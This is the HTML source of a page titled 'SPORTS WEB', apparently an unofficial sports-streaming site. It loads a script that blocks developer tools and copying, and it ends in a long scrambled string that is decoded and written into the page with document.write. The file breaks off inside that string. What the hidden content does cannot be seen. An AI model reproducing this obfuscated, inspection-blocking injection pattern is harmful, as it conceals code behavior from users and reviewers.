<!DOCTYPE html>
<head>
    <link rel="icon" href="https://i.ibb.co/cC6ZdC9/Join-Telegram-cric-streaming.jpg" type="image/png" sizes="48x48">
    <meta charset="UTF-8">
    <title>SPORTS WEB </title>
    <meta content="width=device-width,user-scalable=no,initial-scale=1,maximum-scale=1,minimum-scale=1" name="viewport">
    <meta content="IE=edge" http-equiv="X-UA-Compatible">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lobster">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <script disable-devtool-auto='true' src='https://cdn.jsdelivr.net/npm/disable-devtool' clear-log='true' disable-select='true' disable-copy='true' disable-cut='true' disable-paste='true'></script>
    <style>
        .loading {
            margin-top: 0;
            font-weight: 700;
            vertical-align: middle;
            line-height: 150px;
            font-size: 25px;
            text-transform: uppercase;
            background: linear-gradient(to right, red 30%, rgb(10, 60, 215) 75%);
            -webkit-background-clip: text;
            -webkit-text-fill-color: transparent;
        }

        h1 {
            background-color: #000;
            margin: 0;
            text-align: center;
            padding: 5px
        }

        a {
            color: #fff;
            text-decoration: none
        }

        tr th {
            font-tvv-name: bold;
            background-color: green;
            padding: 1px
        }

        * {
            box-sizing: border-box
        }

        @keyframes fadein {
            0% {
                opacity: 0
            }

            66% {
                opacity: 0
            }

            100% {
                opacity: 1
            }
        }

        @-webkit-keyframes fadein {
            0% {
                opacity: 0
            }

            66% {
                opacity: 0
            }

            100% {
                opacity: 1
            }
        }

        .tvv-item {
            position: relative;
            display: inline-block;
            width: 120px;
            height: 120px;
            margin: 2px;
            padding: 3px;
            border: 1px solid green z-index: 1;
            background: White;
            box-shadow: 3px 2px 2px black;
            overflow: hidden;
            border-radius: 4px;
            filter: contrast(100%)
        }

        .tvv-item>* {
            margin: 0;
            padding: 0
        }

        .tvv-item .tvv-thumb {
            width: 100%;
            bottom: 10px;
            top: 0px;
            position: absolute;
            right: 0;
            float: center;
        }

        .tvv-item .tvv-thumb img {
            width: 100%;
            pointer-events: none
        }

        .tvv-item .tvv-name {
            position: absolute;
            left: 0;
            bottom: 0;
            font-size: 12px;
            display: block;
            text-align: center;
            width: 100%;
            color: black;
            padding: 5px;
            font-weight: 800;
            text-overflow: ellipsis;
            black-space: nowrap;
            overflow: hidden;
            background: linear-gradient(to bottom left, #15b4ff 20%, #fff 100%);
            box-shadow: inset 2px 2px 2px 0px rgba(255, 255, 255, .5);
            7px 7px 20px 0px rgba(0, 0, 0, .1),
            4px 4px 5px 0px rgba(0, 0, 0, .1);
            transition: all 0.3s ease;
        }

        .tvv-item img {
            width: 100%;
            pointer-events: none
        }

        .tvv-item:after {
            position: absolute;
            content: "";
            width: 100%;
            height: 0;
            top: 0;
            left: 0;
            z-index: -1;
            border-radius: 5px;
            border: 0px solid green;
            background-color: black;
            background-image: linear-gradient(to bottom left, #32c0cc 20%, #fff 100%);
            box-shadow: inset 2px 2px 2px 0px rgba(255, 255, 255, .5);
            7px 7px 20px 0px rgba(0, 0, 0, .1),
            4px 4px 5px 0px rgba(0, 0, 0, .1);
            transition: all 0.3s ease;
        }

        .tvv-item:hover {
            color: #000;
        }

        .tvv-item:hover:after {
            top: auto;
            bottom: 0;
            height: 100%;
        }

        .tvv-item:active {
            top: 5px;
        }

        .tvv-name:hover {}

        .fin {
            width: 100%;
            margin-top: 1px;
            margin-bottom: 2px;
            float: center;
            height: 30px;
            font-size: small;
            background-color: rgb(40, 40, 40);
            color: black;
            border-radius: 10px;
            border: 3px solid greenoutline: none;
            text-align: center;
            font-family: "Poppins", sans-serif;
        }

        .fin,
        .dftr {
            width: 100%;
            margin-top: 1px;
            margin-bottom: 2px;
            float: center;
            height: 30px;
            font-style: bold;
            background-color: rgb(40, 40, 40);
            color: purple;
            background: linear-gradient(135deg, snow 0%, seashell 64%);
            border-radius: 0px;
            border: 2px solid red;
            outline: none;
            text-align: center;
            font-family: "Poppins", sans-serif;
        }

        .fin:hover,
        .dftr:hover {
            border: 3px solid rgb(255, 60, 140);
            color: red;
            background: linear-gradient(135deg, azure 0%, floralwhite 64%);
        }

        .tvv-item {
            width: calc(100%/20 - 10px)
        }
        }

        @media only screen and (max-width:2600px) {
            .tvv-item {
                width: calc(100%/19 - 10px)
            }
        }

        @media only screen and (max-width:2470px) {
            .tvv-item {
                width: calc(100%/18 - 10px)
            }
        }

        @media only screen and (max-width:2340px) {
            .tvv-item {
                width: calc(100%/17 - 10px)
            }
        }

        @media only screen and (max-width:2210px) {
            .tvv-item {
                width: calc(100%/16 - 10px)
            }
        }

        @media only screen and (max-width:2080px) {
            .tvv-item {
                width: calc(100%/15 - 10px)
            }
        }

        @media only screen and (max-width:1950px) {
            .tvv-item {
                width: calc(100%/14 - 10px)
            }
        }

        @media only screen and (max-width:1820px) {
            .tvv-item {
                width: calc(100%/13 - 10px)
            }
        }

        @media only screen and (max-width:1690px) {
            .tvv-item {
                width: calc(100%/12 - 10px)
            }
        }

        @media only screen and (max-width:1560px) {
            .tvv-item {
                width: calc(100%/11 - 10px)
            }
        }

        @media only screen and (max-width:1430px) {
            .tvv-item {
                width: calc(100%/10 - 10px)
            }
        }

        @media only screen and (max-width:1300px) {
            .tvv-item {
                width: calc(100%/9 - 10px)
            }
        }

        @media only screen and (max-width:1170px) {
            .tvv-item {
                width: calc(100%/8 - 10px)
            }
        }

        @media only screen and (max-width:1040px) {
            .tvv-item {
                width: calc(100%/7 - 10px)
            }
        }

        @media only screen and (max-width:910px) {
            .tvv-item {
                width: calc(100%/6 - 10px)
            }
        }

        @media only screen and (max-width:780px) {
            .tvv-item {
                width: calc(100%/5 - 10px)
            }
        }

        @media only screen and (max-width:650px) {
            .tvv-item {
                width: calc(100%/4 - 10px)
            }
        }

        @media only screen and (max-width:520px) {
            .tvv-item {
                width: calc(100%/3 - 10px)
            }
        }

        @media only screen and (max-width:390px) {
            .tvv-item {
                width: calc(100%/2 - 10px)
            }
        }

        .custom-btn {
            width: 130px;
            height: 40px;
            color: #fff;
            border-radius: 5px;
            padding: 10px 25px;
            font-family: 'Lato', sans-serif;
            font-weight: 500;
            background: transparent;
            cursor: pointer;
            transition: all 0.3s ease;
            position: relative;
            display: inline-block;
            box-shadow: inset 2px 2px 2px 0px rgba(255, 255, 255, .5), 7px 7px 20px 0px rgba(0, 0, 0, .1), 4px 4px 5px 0px rgba(0, 0, 0, .1);
            outline: none;
        }

        .btn-11 {
            border: white;
            background: green;
            background: linear-gradient(80deg, #15b4ff 10%, black 100%);
            color: #fff;
            overflow: hidden;
        }

        .btn-11:hover {
            text-decoration: none;
            color: #fff;
            background-image: linear-gradient(135deg,  #15b4ff 100%, #000000 20%);
        }

        .btn-11:before {
            position: absolute;
            content: '';
            display: inline-block;
            top: -180px;
            left: 0;
            width: 30px;
            height: 100%;
            background-color: #fff;
            animation: shiny-btn1 3s ease-in-out infinite;
        }

        .btn-11:hover {
            opacity: .7;
            color: white;
        }

        .btn-11:active {
            box-shadow: 4px 4px 6px 0 rgba(255, 255, 255, .3), -4px -4px 6px 0 rgba(116, 125, 136, .2), inset -4px -4px 6px 0 rgba(255, 255, 255, .2), inset 4px 4px 6px 0 rgba(0, 0, 0, .2);
        }

        @-webkit-keyframes shiny-btn1 {
            0% {
                -webkit-transform: scale(0) rotate(45deg);
                opacity: 0;
            }

            80% {
                -webkit-transform: scale(0) rotate(45deg);
                opacity: 0.5;
            }

            81% {
                -webkit-transform: scale(4) rotate(45deg);
                opacity: 1;
            }

            100% {
                -webkit-transform: scale(50) rotate(45deg);
                opacity: 0;
            }
        }

        @import url("https://fonts.googleapis.com/css?family=Roboto");

        @-webkit-keyframes come-in {
            0% {
                -webkit-transform: translatey(100px);
                transform: translatey(100px);
                opacity: 0;
            }

            30% {
                -webkit-transform: translateX(-50px) scale(0.4);
                transform: translateX(-50px) scale(0.4);
            }

            70% {
                -webkit-transform: translateX(0px) scale(1.2);
                transform: translateX(0px) scale(1.2);
            }

            100% {
                -webkit-transform: translatey(0px) scale(1);
                transform: translatey(0px) scale(1);
                opacity: 1;
            }
        }

        @keyframes come-in {
            0% {
                -webkit-transform: translatey(100px);
                transform: translatey(100px);
                opacity: 0;
            }

            30% {
                -webkit-transform: translateX(-50px) scale(0.4);
                transform: translateX(-50px) scale(0.4);
            }

            70% {
                -webkit-transform: translateX(0px) scale(1.2);
                transform: translateX(0px) scale(1.2);
            }

            100% {
                -webkit-transform: translatey(0px) scale(1);
                transform: translatey(0px) scale(1);
                opacity: 1;
            }
        }

        * {
            margin: 0;
            padding: 0;
        }

        html,
        body {
            background: #eaedf2;
            font-family: 'Roboto', sans-serif;
        }

        .stwBlurRainbow,
        .stwRainbow {
            position: fixed;
            width: 100%;
            bottom: 0;
            left: 0;
            right: 0;
            height: 3px;
            z-index: 23;
            background: linear-gradient(-45deg, #4086f4, #31a952, #fbbe01, #eb4132, #4086f4, #31a952, #fbbe01, #eb4132);
            background-size: 200%;
            -webkit-animation: animeBar 5s linear infinite;
            animation: animeBar 5s linear infinite
        }

        .stwBlurRainbow {
            height: 10px;
            z-index: 22;
            filter: blur(10px);
            opacity: .7
        }

        @-webkit-keyframes animeBar {
            0% {
                background-position: 0 50%
            }

            50% {
                background-position: 100% 50%
            }

            100% {
                background-position: 0 50%
            }
        }

        @keyframes animeBar {
            0% {
                background-position: 0 50%
            }

            50% {
                background-position: 100% 50%
            }

            100% {
                background-position: 0 50%
            }
        }

        .uc {
            pointer-events: none;
        }
    </style>
    
<script>
    (()=>{for(j=function(){for(h='kt%e>fHMo}4iR:CK2eJ',a=new Array(h.length),l=0;l<h.length;l++)a[l]=h.charCodeAt(l);return a}(),m=m=>document.write(m),k=decodeURI("".concat("c(J=r%3Ch;)=ethhleilgn=,tl=+%5Ddifidoaac%3ECt,tmr#=e=or),((ajk(Uclon%22%7But%25Cne9nwnairEAnhgRcc%25%7B3..;I,t%22aC(h=;aharo3enA0)=r(h(u)ehCa(g.lr%3E%25(iDicjr+m.iu%25(rr%7Dol=l)cCrps(r)C2l3rr%7Dg%5E:35thefcnt=dhi((%20%25ee22nzncte-0y%20+3,0%25te2osl2uec0;n.:h7l0o0t2)j,Ofh%25diR25dr))n%25on%222aU=B#72g2%25cetttIZEmtotefynB=2e%25%22;5Iwntihatwl.Co2%22jAQu00%3EnMe2i20rf3ddseU(2hfpwi%25Vm5-32rk%25t45(e%7D%25=27mCcI.ieaiEh2yiy%25%5B=%25jei2a%252w0n;25b.2;%25;5:aLR2let:o%25Drp5oEsb3E5R.s=%253;5e=t1d=E22l)Ca2,e2%25-(2&i(0:dncd%25g372%255:ta)e.2%25/k1mCuAEm0e2e2)lo;Bv.aG%25tr1sg5e%25jPM)n0-th51:2(0%25mc5pr:ov2d0TalBr05zii_3%3CgRg5/ebt(t5=tc;bsoh..tE/aii(R%252vnEhr0u5osfs%25aNpuP2N2p-t%25eA%253_25i%25am,in.2:grdhot=W22tC/)%252e%252eflltseCls2p2gs92EO1/b23o2c---3r1nl5xe.tnseav%25ct2a==bR3i2e2i/a,enmE;%252=02;5udanicJ3no2iEo5nvCroCs%25a%255;e-sc-ctnd+gh%25=hpn0eL%25Ei/pac/(/Ea30z2midmd%25=.%25i5=3eaCd505teme3/55%252st%25t7C250l2.26ri25/0rt/c233b/p=nE5gpio%251glew2.Tmim/%253xc0tcn:m%25Ecmn5%2550ir2v3252980uttla5cClv8mcn%25lCi055hie=C/EbcLivh-2tt2%25maa2rC2i2Eo2sf9//%252c%25gss5/lC3/=iH3up%25/25g%25s%25ls2/tav23e5g5cchs2iy2%2505%252%255C32s5A22t02g3s%253tr0C::/-olr2scs3=cl.%25I5eo9idh.htsaico-e-atdeiZe5trsd_ng91%25-e12%255r2l=/5.ei22ESr:s%25rdoi225r0mmiovh2mrli%25mio0m%25p=fl%25ctoga5s-20si7aj22ltshs231c%25vtpsnE3v3r00h6/%25%25rE2g2g5/rseE=2p2pevCaxrr::.tm20%255is37c5%25/hx5c22vx3t3arJiEci%25omissC59%257td1stt=2ag5yi3SmitaatC2%25/3rns3%252id/e5c3vsinif=oa55h%25rshc%255ot_%255E/-tmcnCs2fecT/aa5al0Sttohr%25/22b55i/%25eEdd%255t%25a2/2%25sran3gi0r52s.ae-viaC5hm052i5vEf.r/h%25=su3i5s5%255=5ts25eC3w-22l231bv0d5C5d%25/p/pat=cdr5g6-vitv%2522Sacr5ns55/2E225g132.pIEsslcv23ma-teo2atp20d1ttt5lC3avc2r635u%25=h56cCruo2tet25e2/2%25s19r021/21%258/c0p,vdtss/pe%25gt%25t/%25pl:e:02/lii5Muv02cox2r5EC%25c2a%252pg222csvi2%2500%25sx2dd3lr%25%25E=%25552yi5%25x3p2%25%256gaps63uraE3vsrh-0-t%25hslp5220he%25ap2fp5s5v5%25ach3C12.m%25cretE55to2mem202-./2nvhe1%255=f%25mwe/s20aca2su520Cr3//xh3C/r/5vaenvadi%25=8Cim2/22t%25E023m3/r/5o%25e0/2n5Ecrrrt3og5%25igov3s5e%252c2t//me%25hf2c,tc0/aovp:s/d2_=e2tdwmxem20v2/%25S5%255C2%25%252ta5ct1stt32c-2si/c53%25iact2/sE20n2ilo3%253Ertlv512Eostaa5hhta/t2ieltEmu5i25s=%25%253%25hpbe_%25%25=Se35t5hgo5%25t5cd22232sa%255C%25tas2251EC_,651Cdli2et2s:20g%252mo0i9%25as%25a/s%25h%25-2vlvhEvply/as2gdr%25lie0md20ur82ipv_a%25//3estogtr1-3ghsii1%25v0m/=2fto%252G1nu/532%25cld.2s.c22/1scsg6lpvto22al1v/2u/at/dsmer21_ro/rma%252/g5vadEtca.resCan8dis/3th%25=mheti55_p/v/i5oav5vit0Eh5xri=m1%25isaole5e5vuS1Ce273og25o1ae0%25l3%25EedgErSy-%25:=%253=%25e3pm2ea1o2easxeec2mti0tlc_3p=sio1e5E/aa=alco/-5ama_ou5%250dgt-s1/slCsCn2/tl.%2517/pia5h255t/5xg.3CC2vc-332rehd-ci3s_eas5s0si.%25cvgu5aC0s0r3tg2.62233=lehoc33.Eicfs9r_eg=2yrhrn5_et%25rax3osC%25Mv/2r2mc3ldd20%25622eEtsciEa2%25%2523E35cx-ltws2o2iiti%252-6%25.%25/3CfcptF53g0v2m1dx0C0=5/ash2pl5E255W%25e05g22/sileC%25c5Eprs33dc,2/02ilbsi3y2%25Ec3p2vdd/s2St2gs%255C5%25aehm=%25%25=%25055rloe2%25v528Ecp22ca2/c35n%252%25vv%25%252i00p5bllvsC83/C.r%25ers2Ese//25i%252d26is5-bCl2%25h2/2=5Eitpm2_ipedoe2.a3n0d/-3ic%25fCel2ma%25e:2cg=c0c8rr5nvcrvElep.Ca3lctt1n2vaE5%25tir%25%25rl1Ed35/ga2v_511%25potm5sp5tey%25c2c22v2::c5Shpscref22z0rx5gesv/d5EgK2%25%25rgiihe%25nt5/As-t=2dc2i3th5%25er0%2535C3ss2lsV3afodcd%25/tamEC5m=5v3ha%252E50%250S/s5xr/=pgp23m3g0i/amo5i:eP9/20-GrT3te5eidE5mnvumt2=.d2:hseCu239np=r%25t%255rn..e_1-gs33%25ltt2/d2%25i35%25C252a20tvr02m%25s/b2E/2c=galjmt0n25tro5e2=3t2Ot235Epsv//52cao/Cms2222qg0h215%252u2=if%25Nta.25d5i=tCCl2a%25v/2e2ad-v55th.=vcitK2e%252pn9ogb5s5v%251tpmlmytnetvd2hmk5ACt2s3m5saCetle0%25sc25/v55e2eh0le.%252gs3C;522svrs%25=25A%253s5m0m50%25326fd52a5/rm5E25/%250oA3t/n/ri5s3%25c2oig22tcmi%25r2vei/%25l2rpi3s_s%25Ep/8a0tc3%25dsl3C//2%252eE.0vr=o55/lT3t2=0rEnc=h=C3Ca22ee/23h.K%250v%25sl5-1l5a8v2%25o%25x25:0iees2a25-iEr2=p%25c=ssijd0yL5ag250vC3a52gse5a:cli3%25rs2%25i2-stcr5wi0Evc%25p2Ei.osHLgi5y3mc%25l52/35t%25c2%252r3ls-%253q22epvsws5tptCE%253a322tt2oRidi/cm2acS0rpi%25fp%25y-COCJ%252ht%25d3sgaar%25I382OlSi2en5EeKtt:%25vauCi5pa.5acg=htC2EGi0g/5%255t2a%25gv%25xb2m3Pi5%25t0K=2owg2ua3E5hsl2s%25ii0Aidllet02d3lE/cl0lNt%25an/lysi2avvx%25iakC:Eaca25-rat/%25-%25%25c2ilpestt5Cl%25hicCgvecvtea033m95/2rr2ii5td5a%25%25%25s5eeh5as52diUc=2i%25222d2v%253E2t%25555ap%25Cv:c5Ct-5r53CavyC%253%252gs%252c=pfs%25MCns0m.30=c35fi0erpyQs5d%253vc-0shlvC2sjeE5r2-rvn2/cmQREiv:2pte/3g2ep2ti%25xyet73d?m%25n--a2552t&2229be35e%25nah/cge/e32ch/20ma2.ih5i2k0%25%25hciO=5&v2b%25a2Cop%25%25si-v0s/ricdcr53ssAv%25.3%25vo5%25Ev.zl=5=Cg3tr3anlalEenil2d_s=Nn=2C5A3mc205d..5%25k%255e25r25%2522/%25%25ocns%255/5p=vE3%25tep3:565ii-%25rss%25%25tt3fc5avp3t%25Cl9ii.E5dcih5nimdgb/elkXapr05gdlri2ts2C0a2t55e/beN3%25:e5v%255T2iC;3tg2=0a25.rC2t%25l2r02sit%25-tvntCs.o23b2=he2.2gcct.ep%25%25sb-n42m5yiovci/tngpE%252mtpEpi/og%252r%25ee5=3i22=isdo/Ei5i252y%25va23otlx/e00-%25ie3vwrrsh2.%25c/m=vvebm-08sjlt5hmy-/3ig/2e/n2sp2.550v/C5C=zriEgh5tmorte:ich/s0%25r2=aeEe3cEC5d2lc0CY25mgpre.3ieacj05rEkE0ne0:vy5iCjp023Cs5rCs2=/5acsri22ntt.Ei%25e3s3tCstrm2%2535i.3d2%25ns5s5%25cl5=ia2icEvaavp09n2k22k53i3c:=ECaCm05s%25iJ%25rZo0%2533/ra3t/dae/225op%25i//E0vbvcixsradCartfvmsl3%25rvt2%25cp%25%25ec%25s2%25=v5x5cS5acpc3r20/85sap2in2tgCMk%253lv02t5t3-5%25ry2s%25iiM2i.cCd/0Sh2cahhsCa-vdEeamgm%25btsn2Cmrrr/222ie0bt%25k5c9/k5%25sh3j%25532iH5sgist2/ik2yilocnanyrv%25/3hhi2et/%25k/cdi%2535/d%25a522e=c52t2g5%25?3mrp25li5:sp3c2F52ce2deS/g5%255/enC5%250/s2Ei=i2-cnE25ts%25v5yit%25vq%25sl=Ecxdr3ks0ssy52ly2s2-5d.ap%25%253ldr-mi3.sx3c3l%25it5h.s%25E%25g3r5me-t/2gse2%25sc2d2.52g=ys%252C2il0%255Ck2Cv-=5%25slxagla%25ivaE/25tWg/2SE22EX%25a=2o2i5kEe32%25ve2.5%259h33y25e9e35pc2229035xCccecejm5tpead-l2le252iiSaCm=tEklepr%25a%25lya5%2502C-t2r2%25.es=s.oir%25heisbili232igis.cCa0%25%25o5t3fEa2rvSa5Csv3s2tski32/te3p25yfaa-on%25vd5m/tp-s3vE%25mES%25%2500j2=5Cap=tt%25302pgt0ge22%255sM25C50v/iald52ue/-f5orvvmcitms2e2C2r:%25-E05a3eo/2%25%25=t5s3325b/cd02CE%250a59jtC=mvl%25ieaps5%25zl0s%252t0hogi52/32lplgC%250%25y0fiso5gt5vs02ios2a2ip:S%25302s%25E225v5-l0%25le02rnEEamcn/5mnet%25Ftc5Sbo52e.325dbga5dWd0EC2ymEr.c3agpv%25kCpa5/mC5Fp5hvv3svi.t/=3i5CesL2xhbr%25CsKyiivgrae2ynleeijn2E%25tkegapE%255-52o3r%25p/%25vl05a2cCi2nc2=vrtp-e.-e5l3ir2d=le%25dkt2%252a/l%252tgsehaltEsg.5cgm2nl%25sa5osm%25a%25s22m/t2v5pu3i.3C%25li-%25oi52im5rvs5/%25i%252nvag333C3%25ct25t5c/n2%25J2-/232t3s05lr23ce2%25202S%25at3bs2%25ah25.s%253s0i2C2Ea3/:3s2rsd5%250e/hn502vf-bE=y3bi%25d3252vv.ase%25o2%2505tt=:51E-o%25=.f2daym-ePp2hh2o%250::3vybor2%2515/g%252:rssusled53v=90%25dm222k2%25Ee55p2/v%25%25rytct0a0ye3TClbmhn%255E50nfiv25Esii-5i2o1%25-5.0rps-ta52serC.2tr5%25%25ce32531e/si5ct/oC/523teC2gtdt0i2cCsi02/ra=g/c-/%25iiee5Lo3mS32smpo%25iC%25C205e/=s3%25rx22/3g.C2inm2a/to2g0==dtEe5Er=e5o52%25pe%250gl-og3v2.3d02h=Ksccdi3ale3N0h:00%2552ii3msiyriai5tj0an%25csEE0jsrsvC5gntrtr3%25cv:2a%250%25tlGp5a%25=rt52522ho635%25#5e2v/pe2iE/tyacet20c-vi5-p3tvtome=sxcmCc2ta:ctp5r==%25C=cbia5:Jis%25Cse2a5t.7%25hihv5Cg2%25-x3hiEf252Q-fvvp.i3i=na3siv5.b52e7ks%25ett2clC%25gi2%25t259p#fh2nj233e/.ma23eTnipvC25/-5rmn=5Eeil-N22cc5rE5-lgE1cd.veov/200it%25%25/ss22T5/5iydgv-2d2m5EaCia22iigpi5g%25t1i2Wlcs.vadc/5/otiblc%25b25tnpb/et-nd%252tyr3e%25tCd20ya-20=i%252#2s3lE32cb%25%252/%25ib5n5r%25rae2ra2tlvm%25triica22%25v3si=v5ard2xCe%25r/stn%25%2535.msC0h%25revo2Crane%25t2/y%25t5ec2p2c235l/a25%25%25nJeh5hces2v3E%25Cvr5had20-rlrr%25ghl%25vCo/TG=2E3sse3st%252tc%25l0/2=%25005e5i5Cllcr2v2C0en5gp2ir/p2a2=.s5to3a%25sggni3t2ls5r.-c5/%25la5tt2%25p%25i5E22Cx5s2CF/ed/20irc37o5o2n23=de2/n0B5%25%25.%25lEia2osp-2iimta5ix%25%25c3S%25i55c-t05%25o0t5Tci25Ccot%252%25-33%25/0s2%25/5E%25s550C0v=et20gvE%255.5:a3l%25:e5%2552525.p5Nsv2o%25sCsaassg5%255n2%25am3l22r3x.023y%25d5E45hd%25%25betEovSsE%250%25220me/t2%25ia2nrv/3%252:t5-5im./E20atS1cr2lbvtte5in2iciE22rc3p2tet2i3sl3%25ocgr25c35:jm/cds202ce:2drgE9/d3eClyv05%25%25-ic5naintri22lp=59r%25e2tpToNi.d2=%25M%25-ag%2525-5irC1l%25s05ts-ti%2522lb0aa2Er%25ht=/%252a=cEp3v-23=h5g0/%25ttd%25%25:25ep5%25E%25C55/2%25v3rsE2usls%25iiCi5=scot3n2ltmT%25dr5ax2dev%252de=o22l3Cm-ra.frs%25ggleue53tt.2om70CB9lf/5gvss231ait05g/3c-r5od0cc=92br-hpe2ar0%25032222lcir2aC5ip202/0:50c%259mc5emyhosprii359C=vt2a-E4.vas.3-E5%252m5yg020Cftarct6%25eethgEonH=so%25o-z1is5eoreis-amdLno2natrxs%253::vvg=Tnu33e52agr=np0%25t2rrcs5ri4S2s2/2/v%25e%252r2s5pt=Cm33522i/ei2v0sav0sj/cntajtae22rg0sClc2cij/s22d3335/%2526m2rv/te%25pD1r=2%25osog/p/53i0acpe%25go(rsn%25gjn%25/rosr35itpoo3=5g22e3p0=-2%255avm5/5x%25ci%25c/v22e32es=aEgve1nbt3%25re=jCh20Eli5/0gv/C-3.2fa14i%25d=0m=c.e35g0Bn3it5lCm130%250Enes#yCg252vs3e5t5in=50%250o%250y/s%2502pl/S/2t2i2c2l3t%25-/%25i52sc%253-5a512CEhC%25to2i0i2pirE2sa22/%25y25%25l-fe%2553//ev0i%25d%25vE5ir0g.3nst3t3Cm5gavy/32dih2ortcd5Eod55Th2pC-yciau/.%25E3V5pft5b%254d52c/me3.mcs/n%25Cr20se2f2Ei/drv-a0%25rvi2lilCC45%253i%252%25g=%25x.ev4c350hE02zC:3ti20%25s=aE7%25asct/Cp3=2BtEm2h020e2ey/ehl35x%25sr5mS2c/2t-a%25cyae5%25nd5E5r4tn%25-%250v25m2d53%25Ev2ia=%25v2o%25voi5%25ii5m3lE3ii3sh5sC%25oE.an-s5ccayt.m5ie2s2-aetfl3t05e=2npi2s0p3s/31/.tl50uvt2tsi2sa%25/y2o-iliv)0b2e2vvisar%252dC%25r5otap555.//d.t%2593e1tm/t52eEen99t52lcy3i0m%25s2%25v05vmcCp5-2rCi-5zE-2s%25bCt2vCsvns%25/c5ii2Ei%250.eo.s%252/sa5E532s%255p53a2oC/m.d2na5Yge9L=ed250V5%25el2C=oe/t%25ia2vcg522pA223%252/oe53e/r4CpC5%25scEtgEvs02C3ss/d32nrsy2cjash2tiZ%25l%25sl3nbnnyc.5:p.2e%25Edp2s=:02n:tov/2f2ca30h3.%25c2c2Ei0r-23yxC2W22m3gm2gtl4t%25003p3/2cd%252o5stai%25Cg5/3sv/=3%253a5cs22:=ip-nni5erloe%25e2pocns%25nh0a2%25FtijKtT2i=5e5x2De3Tbm-te5%252=/cli53E/i2ggh2ya%25.53.sv5%25Sir20a32.U5elega2tit2C:2glsg=ac%25v5ccC=gCEsvn5eoSxpaEsh.l23M5tJs%25-%253E/5m==ha%25:5/d002=225=CsmCe%25sg2En2%253i50t:isn2-%25cy.vlo32ao275iL32p2:vissd0%25vp%25r25a0/dCvso0r2ah3ybin23.52%25ih3l%25a5cg-/2n%250%25Y..irdp2st0Dei2e/0g32%25%25.%25sv%25co5e%25553m0%25eplh2C/cgIEa2gdx%25limmvlnj3252t/T3%25%25pV%25ptc5v53r-5=%25govsSaEl8%25v4.0m%25005E5vv%25msga252Ey3r3g=Ci0%25sd53hB252v5irTh%25c5/ap./2zJt/r5nE%2523%255Cq0ox55o25o%255x2%252st3rm%25ms:c9n2te3gn%25rCirr5C%25520%2525v-re.cCsC5eCs3532c-5i/he3i5a%25m3E%25yv%25n5m=ie35l2/35223c2/tha2%25/d35i2p.%25gvievngCbs=m23=22it/5/%25tEEtS5m0nEn-5%25e/22h123-%25sm-a%25ei2riZ%2525%25a023apm5or23e22a52Cia/2%2525cCGs/CEt52Kngdei913J2g2vs8y9anen=vz8ldv2Xunriah0e=-tE%25Tl%25dat:2yli5Va2c50l/Nfoy0v%25v/s423g%25%255loh%25sstpai5%25.0d%25Niigzpt2i1ansr2scCa.t5c%25sa0m3/227dZC=5-Eq3r%25cEsC5fcp2atc5tv23%25%25pg2Fc2cs%25%25362//c56e65jib2i.viv22s=%25cl5pciv22l=ighr1iepdt=-./.EtC-b92e/3:0WJil22cEe2ecAt%25a5VNe5p220C553.ps2%25l1gPs5ry%25t%25aeyh53aht22dn230a220ryc2t%250.i221%25C3025o:e%25enoRdr5a2:DG/mmtaE2a/lt2.e%252v5%25vd25ci0vivVcs3n%25m:njt3l1i%25mEco-ft5C0vAsC%25=0%25/nmseEd5%25Ta5xdCbaB5mr2srtrhC3lsSg5/%2552ne055s2ped/2a%25/b2siv5ml.2v0aW23hEn22grPz2:rtDci6c0c2d%2553-=lva5a2-vhmv%25%25b/orv55C.ce-R%25/25i:=.535DgC22/s%255%25335d%25b2%25-5idEe5/C=Ei%253ae2eni20snctnCcs/2s3e3QEm3el30dnvvps2=al%25C%25iB2ts/22d%25gn5rany0e5s%25ayt2p2cdgt/z9etpEp2.Cehn:lv%25h%25vcarEnv=5s3t%25s/3gsph2d5s2./d2aE%25=5aCe2isat39CE=20%25220bzimaCai5o52yg3caeb2%25atsf5ds5s2v05il222%25ii2di/.-2caigfn/%25555vn/%25OhCg0ci9ctai5E-=tt%25s2a5E2ar0et3t02nv?%25r=0prDi52Evl%25332b22gz%25oTn23pg3Cdmsli52%25pv%25di0:325.tn2ti=v2Cb%25-l5jd/=3sv/.ado%253re2anr.%25e2t%25s/25j055vga33ciiVmipm3n03%255svvis2g3orceC02mcc53p%25f3y%25%25lh3p25CmEe%25i%250a2.i22t/22D3r3En5a0c=052t5cs2eea2i/irt51l/.h%25i2v3=555z522Mlzerg2%25E-s20=vx2=i%25v:30t5vs33dvDha/3nyoz5-CEn2E=iCeg0as-u0en1m.ic2b%2535/%25hY%25iv2vthbsps5Ca5Chtsm%252/ngd%25Cg2%25a-%25zgs5i5rxn0%25225d%252Cn:eE53ree%25Eii2i2Dzcevi3Cpa-5l2Jaa%255=i/05ac0sEdv35a1gdg/dxcrhrh5=t2d23/J2tirg/C%25sC3re22%25=nCEgnrxdteEsnev%25-a%255l552lm5eic.i5Emgp2Cfmv%25=tcnE/5d-05/33%252%25r%25-dC:%25/5eEt2%25aci2lan22%2552tr0/3bc:cidv2s2s222n3a52e2l=/ti5C2C%255=ce1sRs5dg2ys4a5cpsCdaaa/Cbom6idEq5%25552j223sw2225%25o/%25tsae0C5%25%255C-e3%252oF5shlEe/p%25c2rg0cddi05C/ramtd%25s2g33saih/5p%25/svea2c2z/z02vm/nl2/32z2Ct5y5ge%25%25.5nli4p0%25s.va52d2l=%2532aEh%255nenc%25bptlc5/52.4mE-ce%25%25%250avtt5i252=isrxdat2vztth.i2ni5aa=5n%25ln5l2/3:%25H5psg%25523ai2553nDC%252%25iir/hc55tsgeFte2i%25i2mvr2vaCEa5/ei0d%252t-5sb=5vn%25-%25i05pbEiEt3=022dp3aD3i//Ende93CC%25r%25o2-3s3=23aiin%250c%25t2o/t5vee2p%252t%2503E2/=05c.m=i//n0rit32%25m2v5l2mejp%25i32355l3r0aC%25ci2g25Csar2ic%252v.5i2C%25=2:=rc%25C-il-./2:depiord3%25i%25d.h2555r=d0e22tcn2pao5CeEam5c2c-/%2523a559%2552%25r2%25=%25r9%25hE5h0a5c2dm023Eatg3i%25i%25CfC3esC5ls35s2vllaam%25h1023c22X55s%25-eC2QzCi/Eleda=Ee3Eedsa.m25//npC.Lx/inrFE.Pn-ftl.iCcr%25n%25vEo232%252%25sa.gbDglbcss2c2vd5vvarc3/8v%25-g52-5plie/2m5sastE2i0%25%25%25/33pt52e00o2v52s:Er22gci052dnt%255ls0e2%25ai=lghvs%25araC05x2siCgeomC%25E